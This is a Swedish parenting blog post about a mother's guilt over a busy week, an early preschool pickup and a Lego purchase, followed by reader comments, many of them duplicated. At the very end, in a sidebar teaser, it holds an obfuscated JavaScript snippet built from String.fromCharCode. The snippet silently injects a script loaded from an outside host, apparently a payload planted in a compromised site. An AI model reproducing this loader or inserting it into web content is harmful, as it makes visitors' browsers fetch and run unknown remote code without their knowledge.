En dag då man inte riktigt räcker till…

OLYMPUS DIGITAL CAMERA
Hej fina! Idag blev det en favorit i repris! Min egna gröna proteinbowl! Såååå gott, och mitt sätt att få i mig grönsaker! Inte skarpa Bilder.. Men så söt han är Lill Sture! Frågan är bara vad han gör på bordet? 

image image

image

Just nu känner jag att jag inte riktig räcker till.. På några  plan! Jag vet i mitt hjärta, att det kommer bli bra. Saker börjar falla på sin plats och jag själv utvecklas enorm just nu… 

Jag har haft barnvakt vid två tillfälle på sista helgen. På helgerna. Jag har själv försökt balanser upp det med lediga vardagar. Men mitt mamma-samvete är ganska skört just nu. Vart jag än befinner mig så har jag studiematerial med mig. Ska vi titta på film i soffan, så tar jag upp paddan och loggar in på studiematerialet igen. Jag lämnat tidigt och hämtar sent på dagis. Jag VET att det är en tillfällig period. Men ändå!

Igår lovade jag Ludvig sovmorgon och morgonmys. Det hade vi. Vi sov ut, myste och åt frukost tillsammans imorse  <3

Jag lämnade honom på dagis strax efter 09:00, då påminde han mig om att jag lovat att hämta tidigt.

-självklart älskling, jag kommer strax innan 15:00. (Tyvärr är det tidigt för mig just nu)

Jag inser under dagen efter anställningsintervju och andra möten att sista mötet börjar 14:10 och slutar 15:10 i stan.

SHIT! Jag har tänkt fel.

Att ta sig från stan vid den tidpunkten tar dessutom nästan en timme! Jag ringer upp dagis och ber att få prata med Lilleman, jag vill berätta och  förklara för honom för attt inte göra honom besviken. Dagisfröken som svarar är på rast så hon lovar att hälsa honom det..

Men på näst sista mötet jag gick in i.. Så kändes det fel! Riktigt fel. En klump i magen, jag såg framför mig Lillemans förväntasfulla ögon och hans stolthet när han inför sinaa kompisar sa att han skulle bli hämtad först (det är någon intern grej mellan barnen) Jag står ALLTID för mitt ord, jag gör bara inte honom besviken! Jag skulle inte nunna förlåta mig själv! 

Jag vände ut och in på mig själv, roddade om och kör bilen i full fart mot dagis. Jag kommer inspringande på dagis 14:40 och möts av en Ludvig som ordagrant kastar sig i famnen. <3

Han hade nämligen blivit besviken, när dom berättar att jag skulle bli försenad så hade ha börjat gråta. DEN känslan är tuff! Riktigt tuff! Jag hade planerat en mysig eftermiddag för oss. Vi avslutade med att åka till ica och handla. Lilleman skulle få välja middag och plocka ut egna frukter och bär till sin smoothie.

 Då hittade han mega boxen med sitt favorit lego Ninjago. Det var givetvis sista boxen, jag frågade personalen om det kommer in fler. Nej, Ninjago tar alltid slut och dom får bara två X av dom stora frp. -Typiskt! Hade varit en pendel julklapp att spara till annars! 

Med mitt dåliga mamma samvete och en bedrövelse över att jag gjort honom ledsen genom att förutan om eventuell försening så gav jag med mig. Jag gjorde precis så som jag egentligen inte gör. Man kan inte ”köpa” sig ur en känslomässig situation, men jag lät honom spela på min känslor….. <3 rätt eller fel! Denna gången blev det så.  Han fick köpa boxen efter ca en kvarts lugn diskussion… 

Till mitt försvar så dealade jag med honom. Jag lät honom välja bort X-antal veckor med veckopeng, så att han själv får var med Att betala på denna.

Min lilla blivande affärsman förhandlade snabbt vidare.

-bra älskling! Nu är mamma stolt 😉

Vi har bu byggt lego hela kvällen… Vi är nästan klara med påse nr 1 🙂 

Kram  och  Gonatt

/My Martens

69 Komentarer

 1. Det var bra att du köpte Ninjago-grejan till honom. Annars hade du ångrat dig då han åkt till sin pappa. Han är värd det. Du är en bra morsa. Du gör så gott du kan för att få ihop det. Kram på dig rara mamma My ❤

 2. va inte så hård mot dig själv My, du gör det bra, jobbigt å va ensamstående, utan tex fam i närheten , som man kan be lite lättare om div barnpassning. Jag har själv varit där har hela familjen i Norge, och i mitt fall en idiot till pappa, som det tog 15 år för, honom att få upp ögonen.. så nu är dottern 22 år,
  Å tänk att detta just nu är i en period , var glad du inte ska va 4 år på högskolan ? ♥
  Stor kram och klappa dig själv på axel och säg just det.

 3. Det var bra att du köpte Ninjago-grejan till honom. Annars hade du ångrat dig då han åkt till sin pappa. Han är värd det. Du är en bra morsa. Du gör så gott du kan för att få ihop det. Kram på dig rara mamma My ❤

 4. va inte så hård mot dig själv My, du gör det bra, jobbigt å va ensamstående, utan tex fam i närheten , som man kan be lite lättare om div barnpassning. Jag har själv varit där har hela familjen i Norge, och i mitt fall en idiot till pappa, som det tog 15 år för, honom att få upp ögonen.. så nu är dottern 22 år,
  Å tänk att detta just nu är i en period , var glad du inte ska va 4 år på högskolan 😉 ♥
  Stor kram och klappa dig själv på axel och säg just det.

 5. Fina My, du är ingen dålig mamma det måste du förstå. Att han fick nytt Lego en helt vanlig måndag, är ju jättemysigt. Varför måste gåvor vara vid ett speciellt tillfälle?
  Som mamma dras man väl med ständigt dåligt samvete, vilket är helt onödigt.
  Jag vet, lätt att säga när man inte är där, men jag har varit där…
  Kram o ha en fin dag med Lilleman o alla legopåsar

 6. Kära My, jag tyckte du har gjort helt rätt! Det är ett givande och tagande även i barn och vuxen världen. Du är en underbar mamma som gör allt för din familj!
  Ha en bra dag!
  Kram

 7. Usch då….Jag som är värsta känslomänniskan kände tårarna rinna när jag läste om lillemans besvikelse…..Tur att du lita på din magkänsla! Han har tur att just DU är hans mamma, glöm Aldrig det!!! ? Sture är ju bara föööör söt! Älskar katter….Dem är läkande för själen….En spinnande katt i knät och man blir helt lugn….Nice! Hoppas din anställningsintervju gick bra! Ha en bra dag du och Lilleman….Kram/Annika

  • Jaaaaa, jag grinade också när jag hörde det <3 vilken tur att jag lyssnade på magkänslan! Tack <3 ja, att ha Sture hemma gör gott på alla plan <3 ha en fin dag! Kram

 8. Du är fantastisk My. Du pusslar och kämpar så att du och din Lilleman ska få en fin framtid. Sträck på dig istället och se på allt ni har, ert band. Och lego är bra. Det krävs en del för att få ihop det ?
  Döm inte dig själv så hårt.. Det här fixar du/ni… Ha en go tisdag. Kram Maria

 9. Fina My, du är ingen dålig mamma det måste du förstå. Att han fick nytt Lego en helt vanlig måndag, är ju jättemysigt. Varför måste gåvor vara vid ett speciellt tillfälle?
  Som mamma dras man väl med ständigt dåligt samvete, vilket är helt onödigt.
  Jag vet, lätt att säga när man inte är där, men jag har varit där…

  Kram o ha en fin dag med Lilleman o alla legopåsar

 10. Kära My, jag tyckte du har gjort helt rätt! Det är ett givande och tagande även i barn och vuxen världen. Du är en underbar mamma som gör allt för din familj!
  Ha en bra dag!
  Kram

 11. Usch då….Jag som är värsta känslomänniskan kände tårarna rinna när jag läste om lillemans besvikelse…..Tur att du lita på din magkänsla! Han har tur att just DU är hans mamma, glöm Aldrig det!!! 🙂 Sture är ju bara föööör söt! Älskar katter….Dem är läkande för själen….En spinnande katt i knät och man blir helt lugn….Nice! Hoppas din anställningsintervju gick bra! Ha en bra dag du och Lilleman….Kram/Annika

  • Jaaaaa, jag grinade också när jag hörde det <3 vilken tur att jag lyssnade på magkänslan! Tack <3 ja, att ha Sture hemma gör gott på alla plan <3 ha en fin dag! Kram

 12. Du är fantastisk My. Du pusslar och kämpar så att du och din Lilleman ska få en fin framtid. Sträck på dig istället och se på allt ni har, ert band. Och lego är bra. Det krävs en del för att få ihop det 😆
  Döm inte dig själv så hårt.. Det här fixar du/ni… Ha en go tisdag. Kram Maria

 13. Här sitter en gammal mamma med två fina vuxna söner.Jag har hela vinden full med massa lego och konstiga leksaksgubbar. Vi ska inte tala om alla samlarkort som de övertalade mig att köpa. Gå inte runt och ha dåligt samvete det tar bara massa onödig energi Kram

 14. Här sitter en gammal mamma med två fina vuxna söner.Jag har hela vinden full med massa lego och konstiga leksaksgubbar. Vi ska inte tala om alla samlarkort som de övertalade mig att köpa. Gå inte runt och ha dåligt samvete det tar bara massa onödig energi Kram

 15. Ska berätta en sak som förvånar mig mycket än idag: jag har 2 barn som är över 30 år och som jag hade ensamt ansvar för i stort sett då barnens pappa fanns där men tog bara ansvar när han hade ”tid”.
  Jag startade ett bageri som innebär MYCKET tidiga mornar med ett evigt pysslande om barnen som gick på dagis. Bageriet gick bra men jag sprang rakt in i kaklet efter knappt ett år och med ständigt dåligt samvete över barnen.
  Sålde bageriet och separerade från barnens pappa samt gick tillbaka till mitt gamla jobb som chef inom vården. Mycket jobb även här men med rimliga tider.
  Var nu ensamstående med 2 barn vars pappa var ännu mer frånvarande ( här var det inte tal om vav ) Fortsatt pysslande för att räcka till och fort satt dåligt samvete.
  Gick på samtal där läkaren sa : i samma ögonblick man blir förälder infinner sig dåligt samvete oavsett hur vi gör eller har det, tänkt på de orden ofta – det hör liksom till föräldrarollen….
  Under de närmaste 15 åren kom jag i svackor av depressioner med långtidssjukskrivningar och ännu sämre samvete för mina fina ungar. Ibland var jag så ledsen att jag gick upp fick barnen till skolan och sen i säng igen och bara grät – tänkte mer än en gång på att de skulle få det bättre utan mig! Jodå jag medicinerade men det tar ju ett tag innan näsan kommer över vattenlinjen igen.
  Nu till det allra viktigaste!
  Idag mår jag bra (pensionär) med som sagt vuxna barn och härliga barnbarn.
  Vi har under åren som gått pratat mycket om hur det var under vissa perioder av deras uppväxt som jag minns kanske inte var det bästa, vissa extra känsliga situationer som jag minns och händelser som jag minns var svåra.
  Vet du vad? De har i många fall glömt, i andra fall en helt annan mkt positivare bild.
  De kommer ihåg att ibland var jag ”hemmamamma”- läs sjukskriven som hade bakat bullar, att jag alltid lyssnade på dom, att vi alltid pratade om allt möjlig som andra föräldrar inte gjorde med sina barn, kompisar var välkomna i vårt hem att vi reste osv osv .
  Ska väl tillägga att det gått bra, väldigt bra för mina barn trotts att deras mamma var lite kantstött av livet ibland men gjorde så gott jag kunde just då.
  Blev ett långt inlägg ………
  Kram på dig, du är en fantastisk mamma och den bästa mamma åt Ludvig.

 16. Fina My
  Ha inte dåligt samvete. Du kämpar och vill din fina kille väl. Du jobbar även hårt med att bygga upp en framtid åt er.
  Jag har varit ensam med 3 barn, nu vuxna och jag pusslade som en tok för att få det att funka när dom var små och oregelbundna jobbtider. Men…jag la all fokus på jobb…jobbade dubbla pass när dom var hos sin pappa…men tvärvägrade det när jag hade barnen. Det funkade och dom har bara fina minnen…
  Han ser så lycklig ut på alla bilder…även i ögonen…och det kan ingen unge fejka i den åldern. Så han har en bra mamma…

 17. Ska berätta en sak som förvånar mig mycket än idag: jag har 2 barn som är över 30 år och som jag hade ensamt ansvar för i stort sett då barnens pappa fanns där men tog bara ansvar när han hade ”tid”.
  Jag startade ett bageri som innebär MYCKET tidiga mornar med ett evigt pysslande om barnen som gick på dagis. Bageriet gick bra men jag sprang rakt in i kaklet efter knappt ett år och med ständigt dåligt samvete över barnen.
  Sålde bageriet och separerade från barnens pappa samt gick tillbaka till mitt gamla jobb som chef inom vården. Mycket jobb även här men med rimliga tider.
  Var nu ensamstående med 2 barn vars pappa var ännu mer frånvarande ( här var det inte tal om vav ) Fortsatt pysslande för att räcka till och fort satt dåligt samvete.
  Gick på samtal där läkaren sa : i samma ögonblick man blir förälder infinner sig dåligt samvete oavsett hur vi gör eller har det, tänkt på de orden ofta – det hör liksom till föräldrarollen….
  Under de närmaste 15 åren kom jag i svackor av depressioner med långtidssjukskrivningar och ännu sämre samvete för mina fina ungar. Ibland var jag så ledsen att jag gick upp fick barnen till skolan och sen i säng igen och bara grät – tänkte mer än en gång på att de skulle få det bättre utan mig! Jodå jag medicinerade men det tar ju ett tag innan näsan kommer över vattenlinjen igen.
  Nu till det allra viktigaste!
  Idag mår jag bra (pensionär) med som sagt vuxna barn och härliga barnbarn.
  Vi har under åren som gått pratat mycket om hur det var under vissa perioder av deras uppväxt som jag minns kanske inte var det bästa, vissa extra känsliga situationer som jag minns och händelser som jag minns var svåra.
  Vet du vad? De har i många fall glömt, i andra fall en helt annan mkt positivare bild.
  De kommer ihåg att ibland var jag ”hemmamamma”- läs sjukskriven som hade bakat bullar, att jag alltid lyssnade på dom, att vi alltid pratade om allt möjlig som andra föräldrar inte gjorde med sina barn, kompisar var välkomna i vårt hem att vi reste osv osv .
  Ska väl tillägga att det gått bra, väldigt bra för mina barn trotts att deras mamma var lite kantstött av livet ibland men gjorde så gott jag kunde just då.
  Blev ett långt inlägg ………
  Kram på dig, du är en fantastisk mamma och den bästa mamma åt Ludvig.

 18. Fina My
  Ha inte dåligt samvete. Du kämpar och vill din fina kille väl. Du jobbar även hårt med att bygga upp en framtid åt er.
  Jag har varit ensam med 3 barn, nu vuxna och jag pusslade som en tok för att få det att funka när dom var små och oregelbundna jobbtider. Men…jag la all fokus på jobb…jobbade dubbla pass när dom var hos sin pappa…men tvärvägrade det när jag hade barnen. Det funkade och dom har bara fina minnen…
  Han ser så lycklig ut på alla bilder…även i ögonen…och det kan ingen unge fejka i den åldern. Så han har en bra mamma…

 19. Åh vad det måste känts i gossen lilla kropp när han visste att den stora kartongen skulle med hem. Så härligt. Du är en sån fin mamma My. ❤

 20. Åh vad det måste känts i gossen lilla kropp när han visste att den stora kartongen skulle med hem. Så härligt. Du är en sån fin mamma My. ❤

 21. Ang Sture; Det bästa man har sätter man på bordet, sa min mamma och satte upp lillasyster på bordet framför sig, när de skulle ha en pratstund.

 22. Det jag gillar med Maggans blogg är att hon stoppar skitsnack direkt i kommentarerna tom om dig My men här får det flöda fritt och ni jobbar båda med better you så kanske det vore bra med ett stoppande här men men alla är vi olika jag har svårt för skitsnack åt alla håll trist !!!

  • Hej Lena! Nu förstår jag inte riktigt…. Jag med folk plockar bort och blockerar dagligen kommentarer där hon med fler inkluderas. Något skitsnack vill jag inte ha! OM någonting kommer igenom, så är jag personligen där och tar bort det… Jag både rekommendera BY och länkar även i kommentarsfältet in till deras sida..

   • Är kommentarer så ”extrema” så det inte går att publicera? Har aldrig bloggat själv å ja är defenetivt ingen känd person..Därför min fråga. Skulle bli psyksjuk om folk var elaka mot mig dagligen

 23. Tyvärr detta är inte hållbart. Antagligen får ditt barns pappa flytta till din stad eller du till hans. Det är inte nyttigt för honom att flygpendla så. Han får ingen trygghet i det. Om ett par år när han börjar skolan måste ju detta ändå ske…. Men värre föräldrar finns ju. Herregud . Bara min spontana åsikt.
  Sedan tycker jag bara du kan lägga sanningen på bordet angående din relation med M.Graaf. Vad finns det att förlora på att berätta sanningen. Vad hände med den så kallade ärliga bloggen? Är det bättre att det spekuleras hej vilt på tex flashback. Du får ju dagligen frågor om detta då varför inte lägga korten på bordet. Tror du kommer få mycket respekt genom att göra detta men som vanligt kommer du väl inte kommentera detta ett skit så då kommer väl folk fortsätts skvallra och spekulera och tro det värsta om dig… Bara ett tips. Någonting är väldigt konstigt här….

  • Ludvig pappa och jag har full koll på Ludvig och våran framtid.
   Folk får spekulera bäst dom vill. Jag vet, det räcker för mig. Jag vill inte lägga mig på en nivån där man offentligt smutskastar, baktalar eller insinuerar saker.. Jag hat emellanåt behövt försvara mig. Men även det får ett slut. Det tar för mycket tid. Det säger mer om personen som dömmer mig, utan att veta någonting egentligen… Än om mig som person ?

 24. Ang Sture; Det bästa man har sätter man på bordet, sa min mamma och satte upp lillasyster på bordet framför sig, när de skulle ha en pratstund.

 25. Det jag gillar med Maggans blogg är att hon stoppar skitsnack direkt i kommentarerna tom om dig My men här får det flöda fritt och ni jobbar båda med better you så kanske det vore bra med ett stoppande här men men alla är vi olika jag har svårt för skitsnack åt alla håll trist !!!

  • Hej Lena! Nu förstår jag inte riktigt…. Jag med folk plockar bort och blockerar dagligen kommentarer där hon med fler inkluderas. Något skitsnack vill jag inte ha! OM någonting kommer igenom, så är jag personligen där och tar bort det… Jag både rekommendera BY och länkar även i kommentarsfältet in till deras sida..

   • Är kommentarer så ”extrema” så det inte går att publicera? Har aldrig bloggat själv å ja är defenetivt ingen känd person..Därför min fråga. Skulle bli psyksjuk om folk var elaka mot mig dagligen

 26. Tyvärr detta är inte hållbart. Antagligen får ditt barns pappa flytta till din stad eller du till hans. Det är inte nyttigt för honom att flygpendla så. Han får ingen trygghet i det. Om ett par år när han börjar skolan måste ju detta ändå ske…. Men värre föräldrar finns ju. Herregud . Bara min spontana åsikt.
  Sedan tycker jag bara du kan lägga sanningen på bordet angående din relation med M.Graaf. Vad finns det att förlora på att berätta sanningen. Vad hände med den så kallade ärliga bloggen? Är det bättre att det spekuleras hej vilt på tex flashback. Du får ju dagligen frågor om detta då varför inte lägga korten på bordet. Tror du kommer få mycket respekt genom att göra detta men som vanligt kommer du väl inte kommentera detta ett skit så då kommer väl folk fortsätts skvallra och spekulera och tro det värsta om dig… Bara ett tips. Någonting är väldigt konstigt här….

  • Ludvig pappa och jag har full koll på Ludvig och våran framtid.
   Folk får spekulera bäst dom vill. Jag vet, det räcker för mig. Jag vill inte lägga mig på en nivån där man offentligt smutskastar, baktalar eller insinuerar saker.. Jag hat emellanåt behövt försvara mig. Men även det får ett slut. Det tar för mycket tid. Det säger mer om personen som dömmer mig, utan att veta någonting egentligen… Än om mig som person 🙂

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/